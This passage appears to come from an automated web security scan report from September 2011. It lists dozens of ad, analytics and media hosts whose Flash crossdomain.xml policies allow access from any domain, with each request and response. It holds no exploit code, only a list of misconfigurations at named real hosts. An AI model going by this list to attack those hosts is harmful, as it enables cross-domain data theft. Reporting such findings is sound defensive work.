<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

2.7. http://ad.doubleclick.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 21:42:14 GMT
Date: Sun, 04 Sep 2011 13:59:44 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

2.8. http://amch.questionmarket.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://amch.questionmarket.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: amch.questionmarket.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 12:16:22 GMT
Server: Apache/2.2.3
Last-Modified: Tue, 28 Mar 2006 15:45:05 GMT
ETag: "e0686c83-d1-4100ff999c240"
Accept-Ranges: bytes
Content-Length: 209
Keep-Alive: timeout=5, max=955
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-
...[SNIP]...

2.9. http://ar.voicefive.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: ar.voicefive.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 04 Sep 2011 13:59:55 GMT
Content-Type: text/xml
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes
Content-Length: 230
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

2.10. http://at.amgdgt.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://at.amgdgt.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: at.amgdgt.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 12:19:10 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 21 May 2010 08:32:40 GMT
ETag: "308cb3d-12e-4871688bd9a00"
Accept-Ranges: bytes
Content-Length: 302
Cache-Control: max-age=21600
Expires: Sun, 04 Sep 2011 18:19:10 GMT
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-access-from domain="all" />
...[SNIP]...

2.11. http://b.scorecardresearch.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Mon, 05 Sep 2011 12:13:05 GMT
Date: Sun, 04 Sep 2011 12:13:05 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

2.12. http://b.voicefive.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.voicefive.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: b.voicefive.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Mon, 05 Sep 2011 12:15:14 GMT
Date: Sun, 04 Sep 2011 12:15:14 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

2.13. http://bp.specificclick.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bp.specificclick.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: bp.specificclick.net

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Content-Type: text/xml
Content-Length: 194
Date: Sun, 04 Sep 2011 12:18:44 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" /></cross-domain-policy>

2.14. http://bs.serving-sys.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: bs.serving-sys.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=2592000
Content-Type: text/xml
Last-Modified: Thu, 21 Aug 2008 15:23:00 GMT
Accept-Ranges: bytes
ETag: "0e2c3cba13c91:0"
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 04 Sep 2011 12:13:17 GMT
Connection: close
Content-Length: 100

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>

2.15. http://cdn.i.haymarket.net.au/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://cdn.i.haymarket.net.au
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.i.haymarket.net.au

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 12:12:56 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n58 ( lax-agg-n54), ms lax-agg-n54 ( origin>CONN)
ETag: "81752c0b774cb1:0"
Cache-Control: max-age=604800
Expires: Sun, 11 Sep 2011 12:12:57 GMT
Age: 0
Content-Length: 352
Content-Type: text/xml
Last-Modified: Tue, 26 Oct 2010 02:39:24 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-access-from domain="www.myway2go.com.au" />
<allow-access-from domain="myway2go.com.au" />
<allow-access-from domain="*.myway2go.com.au" />
...[SNIP]...

2.16. http://cdn.ttgtmedia.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://cdn.ttgtmedia.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.ttgtmedia.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 12:14:48 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n53 ( lax-agg-n54), ms lax-agg-n54 ( origin>CONN)
Cache-Control: max-age=604800
Expires: Sun, 11 Sep 2011 12:14:48 GMT
Age: 0
Content-Length: 159
Content-Type: text/xml
Last-Modified: Fri, 26 Aug 2011 15:14:51 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>

2.17. http://cdn.widgetserver.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://cdn.widgetserver.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.widgetserver.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Content-Type: text/xml
Date: Sun, 04 Sep 2011 12:16:53 GMT
ETag: "107-4868199517c00"
Last-Modified: Thu, 13 May 2010 22:51:28 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: ECS (sjo/5227)
X-Cache: HIT
X-WBX: web04
Content-Length: 263
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
<site-control permitted
...[SNIP]...

2.18. http://clk.atdmt.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://clk.atdmt.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: clk.atdmt.com

Response

HTTP/1.1 200 OK
Content-Length: 207
Content-Type: text/xml
Date: Sun, 04 Sep 2011 14:00:03 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

2.19. http://ds.serving-sys.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ds.serving-sys.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: ds.serving-sys.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Thu, 20 Aug 2009 15:36:15 GMT
Server: Microsoft-IIS/6.0
Date: Sun, 04 Sep 2011 12:13:23 GMT
Content-Length: 100
Connection: close
Accept-Ranges: bytes

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>

2.20. http://event.adxpose.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://event.adxpose.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: event.adxpose.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"203-1313179768000"
Last-Modified: Fri, 12 Aug 2011 20:09:28 GMT
Content-Type: application/xml
Content-Length: 203
Date: Sun, 04 Sep 2011 14:00:14 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy> <allow-access-from domain="*" /></cross-domain-poli
...[SNIP]...

2.21. http://fls.doubleclick.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://fls.doubleclick.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: fls.doubleclick.net

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sun, 04 Sep 2011 02:48:55 GMT
Expires: Wed, 31 Aug 2011 02:45:52 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 40281
Cache-Control: public, max-age=86400

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

2.22. http://i.haymarket.net.au/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://i.haymarket.net.au
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: i.haymarket.net.au

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 26 Oct 2010 02:39:24 GMT
Accept-Ranges: bytes
ETag: "81752c0b774cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 12:12:57 GMT
Connection: close
Content-Length: 352

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-access-from domain="www.myway2go.com.au" />
<allow-access-from domain="myway2go.com.au" />
<allow-access-from domain="*.myway2go.com.au" />
...[SNIP]...

2.23. http://ib.adnxs.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: ib.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 05-Sep-2011 12:18:55 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=-1; path=/; expires=Sat, 03-Sep-2016 12:18:55 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

2.24. http://idcs.interclick.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://idcs.interclick.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: idcs.interclick.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Wed, 10 Aug 2011 14:57:15 GMT
Accept-Ranges: bytes
ETag: "df382cb6d57cc1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Sun, 04 Sep 2011 12:19:16 GMT
Connection: close
Content-Length: 225

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

2.25. http://idgenterprise.112.2o7.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://idgenterprise.112.2o7.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: idgenterprise.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 12:17:18 GMT
Server: Omniture DC/2.0.0
xserver: www34
Content-Length: 137
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>

2.26. http://img.widgetbox.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.widgetbox.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: img.widgetbox.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Content-Type: Server:AmazonS3
Date: Sun, 04 Sep 2011 12:18:22 GMT
ETag: "2d90099641ed0134bd69327c6a2b562e"
Expires: Tue, 05 Jan 2021 22:31:03 GMT
Last-Modified: Mon, 30 Mar 2009 20:00:09 GMT
Server: ECS (sjo/5227)
x-amz-id-2: PlptY3pYZHc6VTGv2/Mmc6V1HEIy0nl/TPC12D0n+jbALOGZ+tCKnsnrGmeTcMIz
x-amz-request-id: 3B882A831A8DF5C6
X-Cache: HIT
Content-Length: 625
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
...[SNIP]...
<allow-access-from domain="widgetserver.com" />
<allow-access-from domain="*.widgetserver.com" />
<allow-access-from domain="*.*.widgetserver.com" />
<allow-access-from domain="*.widgetbox.com" />
<allow-access-from domain="*.*.widgetbox.com" />
<allow-access-from domain="*.*.postapp.com" />
<allow-access-from domain="*" />
...[SNIP]...

2.27. http://kaplab.netmng.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://kaplab.netmng.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: kaplab.netmng.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 12:18:47 GMT
Server: Apache/2.2.9
Last-Modified: Mon, 13 Dec 2010 13:30:04 GMT
ETag: "684af-6a-4974ab3a2af00"
Accept-Ranges: bytes
Content-Length: 106
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

2.28. http://kaspersky.ugc.bazaarvoice.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://kaspersky.ugc.bazaarvoice.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: kaspersky.ugc.bazaarvoice.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml;charset=utf-8
Content-Language: en-US
Date: Sun, 04 Sep 2011 12:24:39 GMT
Content-Length: 230
Connection: close

<?xml version="1.0" encoding="UTF-8"?><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"/><allow-access-from domain="*"/><allow-http-request-headers-from domain="*" heade
...[SNIP]...

2.29. http://m.adnxs.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://m.adnxs.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: m.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 05-Sep-2011 12:50:06 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2230616255569715877; path=/; expires=Sat, 03-Dec-2011 12:50:06 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

2.30. http://media.fastclick.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://media.fastclick.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: media.fastclick.net

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 12:19:15 GMT
Server: Apache/2.2.4 (Unix)
P3P: policyref="/w3c/p3p.xml", CP="NOI NID DEVo TAIo PSAo HISo OTPo OUR DELo BUS COM NAV INT DSP COR"
Content-Length: 202
Keep-Alive: timeout=5, max=19976
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

2.31. http://now.eloqua.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://now.eloqua.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: now.eloqua.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0
Content-Type: text/xml
Last-Modified: Tue, 26 May 2009 19:46:00 GMT
Accept-Ranges: bytes
ETag: "04c37983adec91:0"
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
Date: Sun, 04 Sep 2011 12:17:27 GMT
Connection: keep-alive
Content-Length: 206

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-p
...[SNIP]...

2.32. http://pixel.invitemedia.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pixel.invitemedia.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Sun, 04 Sep 2011 12:19:20 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

2.33. http://pixel.mathtag.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pixel.mathtag.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.mathtag.com

Response

HTTP/1.0 200 OK
Cache-Control: no-cache
Connection: close
Content-Type: text/cross-domain-policy
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 pao-pixel-x3 pid 0xca1 3233
Connection: keep-alive
Content-Length: 215

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

<allow-access-from domain="*" />

</cross-
...[SNIP]...

2.34. http://pixel.quantserve.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pixel.quantserve.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Mon, 05 Sep 2011 12:14:26 GMT
Content-Type: text/xml
Content-Length: 207
Date: Sun, 04 Sep 2011 12:14:26 GMT
Server: QS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

2.35. http://pto.digitalriver.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pto.digitalriver.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: pto.digitalriver.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "784904063"
Last-Modified: Thu, 30 Sep 2010 23:09:18 GMT
Content-Length: 200
Server: Fast
Expires: Sun, 04 Sep 2011 12:25:17 GMT
Pragma: no-cache
Date: Sun, 04 Sep 2011 12:25:17 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

2.36. http://r.turn.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://r.turn.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: r.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: private
Pragma: private
Expires: Sun, 04 Sep 2011 12:19:02 GMT
Content-Type: text/xml;charset=UTF-8
Date: Sun, 04 Sep 2011 12:19:01 GMT
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>

2.37. http://s0.2mdn.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://s0.2mdn.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sat, 03 Sep 2011 23:50:45 GMT
Expires: Sat, 03 Sep 2011 23:42:21 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 44602
Cache-Control: public, max-age=86400

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

2.38. http://searchsecurity.techtarget.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://searchsecurity.techtarget.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: searchsecurity.techtarget.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 12:14:45 GMT
Server: Apache/2.0.63
Last-Modified: Fri, 26 Aug 2011 15:14:51 GMT
ETag: "31b803f-9f-1beb0c0"
Accept-Ranges: bytes
Content-Length: 159
Content-Type: text/xml
Set-Cookie: BIGipServermedia-tt=654362634.20480.0000; path=/
P3P: CP="CAO DSP COR NID CURa ADMa TAIa IVAo IVDo CONo TELo OTPo OUR IND PHY ONL UNI NAV DEM"
Keep-Alive: timeout=5
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>

2.39. http://secure-au.imrworldwide.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://secure-au.imrworldwide.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: secure-au.imrworldwide.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 12:13:47 GMT
Server: Apache
Cache-Control: max-age=604800
Expires: Sun, 11 Sep 2011 12:13:47 GMT
Last-Modified: Wed, 14 May 2008 01:55:09 GMT
ETag: "10c-482a467d"
Accept-Ranges: bytes
Content-Length: 268
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
<site-control permi
...[SNIP]...

2.40. http://secure-us.imrworldwide.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://secure-us.imrworldwide.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: secure-us.imrworldwide.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 04 Sep 2011 12:16:59 GMT
Content-Type: text/xml
Content-Length: 268
Last-Modified: Wed, 14 May 2008 01:55:09 GMT
Connection: close
Expires: Sun, 11 Sep 2011 12:16:59 GMT
Cache-Control: max-age=604800
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
<site-control permi
...[SNIP]...

2.41. http://spe.atdmt.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://spe.atdmt.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: spe.atdmt.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Content-Length: 207
Allow: GET
Expires: Sun, 11 Sep 2011 09:37:06 GMT
Date: Sun, 04 Sep 2011 12:15:18 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

2.42. http://t.widgetserver.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://t.widgetserver.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: t.widgetserver.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"262-1314747853000"
Last-Modified: Tue, 30 Aug 2011 23:44:13 GMT
Content-Type: application/xml
Content-Length: 262
Date: Sun, 04 Sep 2011 12:17:15 GMT
Connection: close

<?xml version="1.0"?>
